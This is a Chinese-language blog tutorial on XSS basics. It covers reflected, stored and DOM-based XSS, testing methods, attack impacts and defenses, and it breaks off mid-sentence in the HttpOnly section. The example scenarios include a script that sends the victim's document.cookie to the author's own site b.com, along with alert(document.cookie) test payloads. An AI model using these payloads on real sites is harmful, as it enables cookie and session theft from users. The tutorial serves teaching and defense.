<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16.ico">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"ashin9.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":true},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="0x01 JavaScript相关语法1 基础语法 123写在[removed][removed]标签中变量定义：var xxx.的用处：连接字符  2 wiondow.open()：是window对象中的open()方法 12345而window对象是javascript中的顶层对象，代表一个浏览器窗口 在&amp;lt;body&gt;或&amp;lt;frameset&gt;每次出现时被自动">
<meta property="og:type" content="article">
<meta property="og:title" content="WEB安全—XSS基础">
<meta property="og:url" content="https://ashin9.github.io/2019/07/17/WEB%E5%AE%89%E5%85%A8%E2%80%94XSS%E5%9F%BA%E7%A1%80/index.html">
<meta property="og:site_name" content="Ashing&#39;s Blog">
<meta property="og:description" content="0x01 JavaScript相关语法1 基础语法 123写在[removed][removed]标签中变量定义：var xxx.的用处：连接字符  2 wiondow.open()：是window对象中的open()方法 12345而window对象是javascript中的顶层对象，代表一个浏览器窗口 在&amp;lt;body&gt;或&amp;lt;frameset&gt;每次出现时被自动">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2019-07-17T13:00:00.000Z">
<meta property="article:modified_time" content="2023-03-28T12:18:57.000Z">
<meta property="article:author" content="Ashing">
<meta property="article:tag" content="XSS">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="https://ashin9.github.io/2019/07/17/WEB%E5%AE%89%E5%85%A8%E2%80%94XSS%E5%9F%BA%E7%A1%80/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>WEB安全—XSS基础 | Ashing's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Ashing's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">想学的太多 懂得的太少</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ashin9.github.io/2019/07/17/WEB%E5%AE%89%E5%85%A8%E2%80%94XSS%E5%9F%BA%E7%A1%80/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/dxx.jpg">
      <meta itemprop="name" content="Ashing">
      <meta itemprop="description" content="Cyber Security">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Ashing's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          WEB安全—XSS基础
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2019-07-17 21:00:00" itemprop="dateCreated datePublished" datetime="2019-07-17T21:00:00+08:00">2019-07-17</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2023-03-28 20:18:57" itemprop="dateModified" datetime="2023-03-28T20:18:57+08:00">2023-03-28</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/WEB%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">WEB安全</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/WEB%E5%AE%89%E5%85%A8/Browser%E7%AB%AF%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">Browser端安全</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h3 id="0x01-JavaScript相关语法"><a href="#0x01-JavaScript相关语法" class="headerlink" title="0x01 JavaScript相关语法"></a>0x01 JavaScript相关语法</h3><h4 id="1-基础语法"><a href="#1-基础语法" class="headerlink" title="1 基础语法"></a>1 基础语法</h4> <figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">写在<span class="selector-attr">[removed]</span><span class="selector-attr">[removed]</span>标签中</span><br><span class="line">变量定义：<span class="selector-tag">var</span> xxx</span><br><span class="line">.的用处：连接字符</span><br></pre></td></tr></table></figure>

<h4 id="2-wiondow-open-：是window对象中的open-方法"><a href="#2-wiondow-open-：是window对象中的open-方法" class="headerlink" title="2 wiondow.open()：是window对象中的open()方法"></a>2 wiondow.open()：是window对象中的open()方法</h4> <figure class="highlight gauss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">而<span class="built_in">window</span>对象是javascript中的顶层对象，代表一个浏览器窗口</span><br><span class="line"> </span><br><span class="line">在&amp;<span class="keyword">lt</span>;body&gt;或&amp;<span class="keyword">lt</span>;frameset&gt;每次出现时被自动创建</span><br><span class="line"> </span><br><span class="line"><span class="keyword">open</span>()方法用于打开一个新的浏览器窗口或查找一个已命名的窗口</span><br></pre></td></tr></table></figure>

<h4 id="3-document-password-pass-value"><a href="#3-document-password-pass-value" class="headerlink" title="3 document.password.pass.value"></a>3 document.password.pass.value</h4> <figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">document是javascript里面的文档对象，里面含有很多的属性和方法，而<span class="keyword">value</span>值就是属性。</span><br><span class="line"></span><br><span class="line">在这里是获得<span class="keyword">password</span>.<span class="keyword">password</span>.pass.<span class="keyword">value</span>的值。</span><br></pre></td></tr></table></figure>

<h4 id="4-javascript-alert"><a href="#4-javascript-alert" class="headerlink" title="4 javascript alert()"></a>4 javascript <strong>alert()</strong></h4> <figure class="highlight 1c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">警示对话框</span><br><span class="line">  函数括号内的文本信息显示在对话框中，把它称为警示对话框，要显示的信息放置在括号内，该对画框包含一个确认<span class="string">&quot;确认&quot;</span>按钮。用户阅读完之后所显示的信息后，只需要点击该按钮就可以关闭对话框，在这里就是一个弹出框。</span><br></pre></td></tr></table></figure>

<h3 id="0x02-XSS定义"><a href="#0x02-XSS定义" class="headerlink" title="0x02 XSS定义"></a>0x02 XSS定义</h3><ul>
<li>跨站脚本攻击(Cross Site Scripting)，缩写为XSS。</li>
<li>恶意攻击者往Web页面里插入恶意Script代码，当用户浏览该页之时，嵌入其中Web里面的Script代码会被执行，从而达到恶意攻击用户的目的。</li>
<li>这些恶意网页程序通常是JavaScript，但实际上也可以包括Java，VBScript，ActiveX，Flash或者甚至是普通的HTML</li>
<li>攻击成功后，攻击者可能得到更高的权限（如执行一些操作）、私密网页内容、会话和cookie等各种内容</li>
</ul>
<h3 id="0x03-XSS的原理"><a href="#0x03-XSS的原理" class="headerlink" title="0x03  XSS的原理"></a><strong>0x03  XSS的原理</strong></h3><ul>
<li><strong>攻击者对含有漏洞的服务器发起XSS攻击（注入JS代码）</strong></li>
<li><strong>诱使受害者打开受到攻击的服务器URL</strong></li>
<li><strong>受害者在Web浏览器中打开URL，恶意脚本执行</strong></li>
</ul>
<h3 id="0x04-XSS的攻击方式"><a href="#0x04-XSS的攻击方式" class="headerlink" title="0x04 XSS的攻击方式"></a>0x04 XSS的攻击方式</h3><h4 id="1-反射型"><a href="#1-反射型" class="headerlink" title="1 反射型"></a>1 反射型</h4><ul>
<li>发送请求时，XSS代码出现在URL中(反射型的典型特征)，作为输入提交到服务器端，服务器端解析后响应(search中包含XSS代码，可以是js或者HTML或者CSS)，XSS代码随着响应内容一起传回浏览器，最后浏览器解析执行XSS代码，这个过程像一个反射，所以叫做反射型XSS。</li>
<li>注入代码是从目标服务器通过错误信息、搜索结果等等方式“反射”回来的而称为非持久型XSS，则是因为这种攻击方式<strong>具有一次性</strong>。</li>
</ul>
<h4 id="场景一"><a href="#场景一" class="headerlink" title="场景一"></a><strong>场景一</strong></h4><ul>
<li>当我登录a.com后，我发现它的页面某些内容是根据url中的一个叫content参数直接显示的，猜测它测页面处理可能是这样，其它语言类似：</li>
</ul>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;%@ page language=&quot;java&quot;contentType=&quot;text/html; charset=UTF-8&quot; pageEncoding=&quot;UTF-8&quot;%&gt;</span><br><span class="line"><span class="meta">&lt;!DOCTYPEhtmlPUBLIC <span class="string">&quot;-//W3C//DTD HTML 4.01 Transitional//EN&quot;</span><span class="string">&quot;http://www.w3.org/TR/html4/loose.dtd&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">title</span>&gt;</span>XSS测试<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">页面内容：&lt;%=request.getParameter(&quot;content&quot;)%&gt;</span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>

<ul>
<li>我知道了Tom也注册了该网站，并且知道了他的邮箱(或者其它能接收信息的联系方式)，我做一个超链接发给他，超链接地址为</li>
</ul>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://www.a.com?content=<span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"> <span class="variable language_">window</span>.<span class="title function_">open</span>(“www.<span class="property">b</span>.<span class="property">com</span>?param=”+<span class="variable language_">document</span>.<span class="property">cookie</span>)</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>

<ul>
<li><p>当Tom点击这个链接的时候(假设他已经登录a.com)，浏览器就会直接打开b.com，并且把Tom在a.com中的cookie信息发送到b.com</p>
</li>
<li><p>b.com是我搭建的网站，当我的网站接收到该信息时，我就盗取了Tom在a.com的cookie信息，cookie信息中可能存有登录密码，攻击成功！</p>
</li>
<li><p>这个过程中， 受害者只有Tom自己。那当我在浏览器输入</p>
</li>
</ul>
<figure class="highlight applescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a.com?content=&lt;<span class="keyword">script</span>&gt;alert(“xss”)&lt;/<span class="keyword">script</span>&amp; gt;</span><br></pre></td></tr></table></figure>

<ul>
<li>浏览器展示页面内容的过程中，就会执行我的脚本，页面输出xss字样，这是攻击了我自己。</li>
</ul>
<h4 id="2-存储型（Stored-XSS）"><a href="#2-存储型（Stored-XSS）" class="headerlink" title="2 存储型（Stored XSS）"></a>2 存储型（Stored XSS）</h4><ul>
<li>存储型XSS和反射型的XSS差别就在于，<strong>存储型的XSS提交的代码会存储在服务器端（数据库，内存，文件系统等），下次请求目标页面时不用再提交XSS代码。</strong></li>
<li>这种攻击多见于论坛<strong>，</strong>攻击者在发帖的过程中</li>
</ul>
<h4 id="场景二"><a href="#场景二" class="headerlink" title="场景二"></a><strong>场景二</strong></h4><ul>
<li>a.com可以发文章， 我登录后在a.com中发布了一篇文章，文章中包含了恶意代码：</li>
</ul>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"><span class="variable language_">window</span>.<span class="title function_">open</span>(“www.<span class="property">b</span>.<span class="property">com</span>?param=”+<span class="variable language_">document</span>.<span class="property">cookie</span>)&lt; /script&gt;  </span></span><br></pre></td></tr></table></figure>

<ul>
<li><p>保存文章。</p>
</li>
<li><p>这时Tom和Jack看到了我发布的文章，当在查看我的文章时就都中招了，他们的cookie信息都发送到了我的服务 器上，攻击成功！这个过程中，受害者是多个人。</p>
</li>
<li><p>Stored XSS漏洞危害性更大，危害面更广</p>
</li>
</ul>
<h4 id="3-DOM（Document-object-model）型XSS"><a href="#3-DOM（Document-object-model）型XSS" class="headerlink" title="3 DOM（Document object model）型XSS"></a>3 DOM（Document object model）型XSS</h4><ul>
<li>其实是一种特殊类型的反射型XSS，它是基于DOM文档对象的一种漏洞。DOM 型 XSS 是基于 js 上的。不需要与服务器进行交互</li>
<li>传统的 XSS 漏洞一般出现在服务器端代码中，而 DOM-Based XSS 是基于 DOM 文档对象模型的一种漏洞。所以，受客户端浏览器的脚本代码所影响。</li>
<li>客户端 JavaScript 可以访问浏览器的 DOM 文本对象模型，因此能够决定用于加载当前页面的 URL。<ul>
<li>换句话说，客户端的脚本程序可以通过 DOM 动态地检查和修改页面内容，它不依赖于服务器端的数据，而从客户端获得 DOM 中的数据（如从 URL 中提取数据）并在本地执行。</li>
<li>另一方面，浏览器用户可以操纵 DOM 中的一些对象，例如 URL、location 等。用户在客户端输入的数据如果包含了恶意 JavaScript 脚本，而这些脚本没有经过适当的过滤和消毒，那么应用程序就可能受到基于 DOM 的 XSS 攻击。</li>
</ul>
</li>
</ul>
<h3 id="0x05-XSS漏洞测试"><a href="#0x05-XSS漏洞测试" class="headerlink" title="0x05 XSS漏洞测试"></a>0x05 XSS漏洞测试</h3><h4 id="1-方法一"><a href="#1-方法一" class="headerlink" title="1 方法一"></a>1 方法一</h4><ul>
<li><p>查看代码，查找关键的变量,  客户端将数据传送给Web 服务端一般通过三种方式</p>
<ul>
<li>Querystring</li>
<li>Form表单</li>
<li>cookie</li>
</ul>
</li>
<li><p>例如在ASP的程序中，通过Request对象获取客户端的变量</p>
</li>
</ul>
<figure class="highlight abnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;%</span><br><span class="line">	strUserCode <span class="operator">=</span>  Request.QueryString(“code”)<span class="comment">;</span></span><br><span class="line">	strUser <span class="operator">=</span>  Request.Form(“USER”)<span class="comment">;</span></span><br><span class="line">	strID <span class="operator">=</span>    Request.Cookies(“ID”)<span class="comment">;</span></span><br><span class="line">%&gt;</span><br></pre></td></tr></table></figure>

<ul>
<li><strong>假如变量没有经过htmlEncode处理， 那么这个变量就存在一个XSS漏洞</strong></li>
</ul>
<h4 id="2-方法二"><a href="#2-方法二" class="headerlink" title="2 方法二"></a>2 方法二</h4><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&quot;/&gt;<span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"><span class="title function_">alert</span>(<span class="variable language_">document</span>.<span class="property">cookie</span>)</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span><span class="comment">&lt;!--</span></span><br><span class="line"><span class="comment">&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;!--</span></span><br><span class="line"><span class="comment">&quot;onclick=&quot;alert(document.cookie)</span></span><br></pre></td></tr></table></figure>

<ul>
<li>在URL中查看有那些变量通过URL把值传给Web服务器， 把这些变量的值退换成我们的测试的脚本。 然后看我们的脚本是否能执行</li>
</ul>
<h4 id="3-方法三"><a href="#3-方法三" class="headerlink" title="3 方法三"></a>3 方法三</h4><ul>
<li>XSS 自动化测试，仅需 HttpWebRequest 类</li>
</ul>
<h3 id="0x06-攻击方式"><a href="#0x06-攻击方式" class="headerlink" title="0x06 攻击方式"></a>0x06 攻击方式</h3><h4 id="常见容易出现XSS漏洞的地方"><a href="#常见容易出现XSS漏洞的地方" class="headerlink" title="常见容易出现XSS漏洞的地方"></a>常见容易出现XSS漏洞的地方</h4><h5 id="1-数据交互的地方"><a href="#1-数据交互的地方" class="headerlink" title="1.数据交互的地方"></a>1.数据交互的地方</h5><ul>
<li>get、post、cookies、headers</li>
<li>反馈与浏览</li>
<li>富文本编辑器</li>
<li>各类标签插入和自定义</li>
</ul>
<h5 id="2-数据输出的地方"><a href="#2-数据输出的地方" class="headerlink" title="2.数据输出的地方"></a>2.数据输出的地方</h5><ul>
<li><p>用户资料</p>
</li>
<li><p>关键词、标签、说明</p>
</li>
<li><p>文件上传</p>
</li>
<li><p>反射型XSS测试点：网站的搜索栏、用户登录入口、输入表单等地方</p>
</li>
<li><p>存储型XSS测试点：论坛、博客、留言板、网站的留言、评论、日志等交互处</p>
</li>
</ul>
<h4 id="1-反射性XSS"><a href="#1-反射性XSS" class="headerlink" title="1 反射性XSS"></a>1 反射性XSS</h4><ul>
<li><p>1.<strong>常见注入点</strong></p>
<ul>
<li>网站的搜索栏、用户登录入口、输入表单等地方</li>
</ul>
</li>
<li><p>2.<strong>攻击方式</strong></p>
<ul>
<li>通过各种方式将包含XSS代码的恶意链接发送给目标用户</li>
<li>比如：邮件、吸引眼球的图片….</li>
</ul>
</li>
</ul>
<h4 id="2-存储型XSS"><a href="#2-存储型XSS" class="headerlink" title="2 存储型XSS"></a>2 存储型XSS</h4><ul>
<li><strong>1.常见注入点</strong><ul>
<li>论坛、博客、留言板、网站的留言、评论、日志等交互处</li>
</ul>
</li>
<li><strong>2.攻击方式</strong><ul>
<li>在发帖或留言的过程中，将恶意脚本连同正常信息一起注入到发布内容中。</li>
<li>随着发布内容被服务器存储下来，恶意脚本也将永久的存放到服务器的后端存储器中。当其他用户浏览这个被注入了恶意脚本的帖子时，恶意脚本就会在用户的浏览器中得到执行</li>
</ul>
</li>
</ul>
<h4 id="3-DOM型XSS"><a href="#3-DOM型XSS" class="headerlink" title="3 DOM型XSS"></a><strong>3 DOM型XSS</strong></h4><ul>
<li><strong>1.常见注入点</strong></li>
<li>通过js脚本对对文档对象进行编辑，从而修改页面的元素。也就是说，客户端的脚本程序可以DOM动态修改页面的内容，从客户端获取DOM中的数据并在本地执行。由于DOM是在客户端修改节点的，所以基于DOM型的XSS漏洞不需要与服务器d端交互，它只发生在客户端处理数据的阶段。</li>
<li><strong>2.攻击方式</strong><ul>
<li>用户请求一个经过专门设计的URL，它由攻击者提供，而且其中包含XSS代码。服务器的响应不会以任何形式包含攻击者的脚本，当用户的浏览器处理这个响应时，DOM对象就会处理XSS代码，导致存在XSS漏洞。</li>
</ul>
</li>
</ul>
<h3 id="0x07-XSS安全性分析"><a href="#0x07-XSS安全性分析" class="headerlink" title="0x07 XSS安全性分析"></a>0x07 XSS安全性分析</h3><h5 id="（一）首先要明确的是，在受害者的浏览器中执行脚本的能力算不上特别恶意"><a href="#（一）首先要明确的是，在受害者的浏览器中执行脚本的能力算不上特别恶意" class="headerlink" title="（一）首先要明确的是，在受害者的浏览器中执行脚本的能力算不上特别恶意"></a><strong>（一）首先要明确的是，在受害者的浏览器中执行脚本的能力算不上特别恶意</strong></h5><ul>
<li>js的执行环境受到严格限制并只有非常有限的权限访问用户的文件和操作系统。</li>
<li>事实上，现在就可以打开浏览器的脚本控制台立刻执行任何你想执行的脚本，几乎不可能对你的电脑造成任何的伤害。</li>
<li>但是恶意脚本有以下的权限<ul>
<li>js有权访问一些用户的敏感信息，比如cookie</li>
<li>js能够通过XMLHttpRequest或者其他一些机制发送带有任何内容的HTTP请求到任何地址</li>
<li>js能够通过DOM操作方法对当前页面的HTML做任意修改</li>
</ul>
</li>
</ul>
<h5 id="（二）这种在其他用户的浏览器中执行任意脚本的权限，赋予了攻击者有能力发动以下几类攻击"><a href="#（二）这种在其他用户的浏览器中执行任意脚本的权限，赋予了攻击者有能力发动以下几类攻击" class="headerlink" title="（二）这种在其他用户的浏览器中执行任意脚本的权限，赋予了攻击者有能力发动以下几类攻击"></a><strong>（二）这种在其他用户的浏览器中执行任意脚本的权限，赋予了攻击者有能力发动以下几类攻击</strong></h5><ul>
<li><p><strong>1.Cookie窃取</strong>：攻击者能够通过document.cookie访问受害者与网站关联的cookie，然后传送到攻击者自己的服务器，接着从这些cookie中提取敏感信息，如Session ID。</p>
</li>
<li><p><strong>2.记录用户行为（Keylogging）</strong>：攻击者可以使用 addEventListener方法注册用于监听键盘事件的回调函数，并且把所有用户的敲击行为发送到他自己的服务器，这些敲击行为可能记录着用户的敏感信息，比如密码和信用卡号码。</p>
</li>
<li><p><strong>3.钓鱼网站（Phishing）</strong>：攻击者可以通过修改DOM在页面上插入一个假的登陆框，也可以把表单的action属性指向他自己的服务器地址，然后欺骗用户提交自己的敏感信息</p>
</li>
<li><p><strong>4.利用植入Flash，通过crossdomain权限设置进一步获取更高权限</strong>；或者利用Java等得到类似的操作。</p>
</li>
<li><p><strong>5.利用iframe、frame、XMLHttpRequest或上述Flash等方式，</strong>以（被攻击）用户的身份执行一些管理动作，或执行一些一般的操作如发微博、加好友、发私信等操作。</p>
</li>
<li><p><strong>6.利用可被攻击的域受到其他域信任的特点，以受信任来源的身份请求一些平时不允许的操作，如进行不当的投票活动</strong>。在访问量极大的一些页面上的XSS可以攻击一些小型网站，实现DDOS攻击的效果。</p>
</li>
<li><p><strong>7.修改网页内容</strong></p>
</li>
<li><p><strong>8.网站挂马</strong></p>
</li>
<li><p><strong>9.XSS蠕虫</strong></p>
</li>
<li><p><strong>10.利用网站重定向</strong></p>
</li>
<li><p><strong>尽管这些攻击类型大不相同，但都有一条重要的相似之处：</strong></p>
<ul>
<li><strong>因为攻击者把代码注入进的页面是由网站的，所以恶意脚本都是在网站的上下文环境中执行，这就意味着恶意代码被当作网站提供的其他正常脚本一样对待</strong></li>
<li><strong>这些事实都在强调一个关键性问题：如果攻击者能够借助你的网站在另一个用户的浏览器中执行任意脚本，那么你网站的安全性已经无从谈起了</strong></li>
</ul>
</li>
</ul>
<h3 id="0x08-XSS的防御措施"><a href="#0x08-XSS的防御措施" class="headerlink" title="0x08 XSS的防御措施"></a>0x08 XSS的防御措施</h3><h4 id="1-调用函数"><a href="#1-调用函数" class="headerlink" title="1 调用函数"></a>1 调用函数</h4><ul>
<li>对于用户提交的数据可以通过调用函数进行过滤</li>
<li>htmlspecialchars()函数将输出的内容进行HTML的编码，效果最好</li>
<li>str_replace()函数可以将指定的字符串转换为其他字符串的，但是会被绕过</li>
</ul>
<h4 id="2-使用XSS-Filter"><a href="#2-使用XSS-Filter" class="headerlink" title="2 使用XSS Filter"></a>2 使用XSS Filter</h4><h5 id="（1）输入过滤"><a href="#（1）输入过滤" class="headerlink" title="（1）输入过滤"></a><strong>（1）输入过滤</strong></h5><ul>
<li><strong>输入验证（客户端）：</strong>前端JS过滤，如检测最大长度、是否只有合法字符、格式是否符合要求、数字是否在指定的范围内。</li>
<li>缺点：容易被修改掉。</li>
<li><strong>数据消毒（服务器端）：</strong>过滤敏感字符（可以和SQL注入的一同过滤）<ul>
<li>如：&lt; &gt; javascript ‘ “ &amp; # expression等…</li>
</ul>
</li>
</ul>
<h5 id="（2）-输出编码（服务器端）"><a href="#（2）-输出编码（服务器端）" class="headerlink" title="（2） 输出编码（服务器端）"></a><strong>（2） 输出编码（服务器端）</strong></h5><ul>
<li><p><strong>可以使用HTML编码</strong></p>
<figure class="highlight scss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">PHP的<span class="built_in">htmlspecialchars</span>()函数</span><br><span class="line">ASP的Server<span class="selector-class">.HTMLEncode</span>()函数</span><br><span class="line">ASP<span class="selector-class">.NET</span>的Server<span class="selector-class">.HtmlEncode</span>()函数</span><br></pre></td></tr></table></figure>
</li>
<li><p><strong>用对应的HTML实体替代字面量字符，此时浏览器会将恶意代码当作HTML文档的内容而不是结构加以处理</strong></p>
</li>
<li><p><strong>常见恶意字符的HTML编码（显示、实体名字、实体编号）：</strong></p>
</li>
</ul>
<figure class="highlight dts"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="params">&lt;  <span class="variable">&amp;lt</span>;  &amp;#<span class="number">60</span>；</span></span><br><span class="line"><span class="params">&gt;</span>  <span class="variable">&amp;gt</span><span class="punctuation">;</span>  &amp;<span class="meta">#62；</span></span><br><span class="line">&amp;  <span class="variable">&amp;amp</span><span class="punctuation">;</span>  &amp;<span class="meta">#38；</span></span><br><span class="line">“  <span class="variable">&amp;quot</span><span class="punctuation">;</span>  &amp;<span class="meta">#34；</span></span><br><span class="line">‘          &amp;<span class="meta">#39;</span></span><br></pre></td></tr></table></figure>



<h4 id="3-白名单和黑名单结合"><a href="#3-白名单和黑名单结合" class="headerlink" title="3 白名单和黑名单结合"></a>3 白名单和黑名单结合</h4><h4 id="4-Noscript"><a href="#4-Noscript" class="headerlink" title="4 Noscript"></a>4 Noscript</h4><ul>
<li><strong>Firefox的一款免费的开源插件，默认禁止所有脚本，但是可以通过自定义设置允许通过的脚本</strong></li>
</ul>
<h4 id="5-Anti-XSS"><a href="#5-Anti-XSS" class="headerlink" title="5 Anti_XSS"></a>5 Anti_XSS</h4><ul>
<li><strong>提供大量的编码函数用于处理用户的输入，实现白名单机制和输出转义</strong></li>
</ul>
<h4 id="6-HttpOnly"><a href="#6-HttpOnly" class="headerlink" title="6 HttpOnly"></a>6 HttpOnly</h4><ul>
<li><p>攻击者通过XSS漏洞执行JS中的document.cookie方法来窃取用户的cookie信息。Web应用程序在Set-Cookie时将其属性设为HttpOnly即可避免Cookie被客户端JS存取，也可以保护用户的Cookie信息不被盗取。</p>
</li>
<li><p><strong>PHP设置HttpOnly的方法：</strong></p>
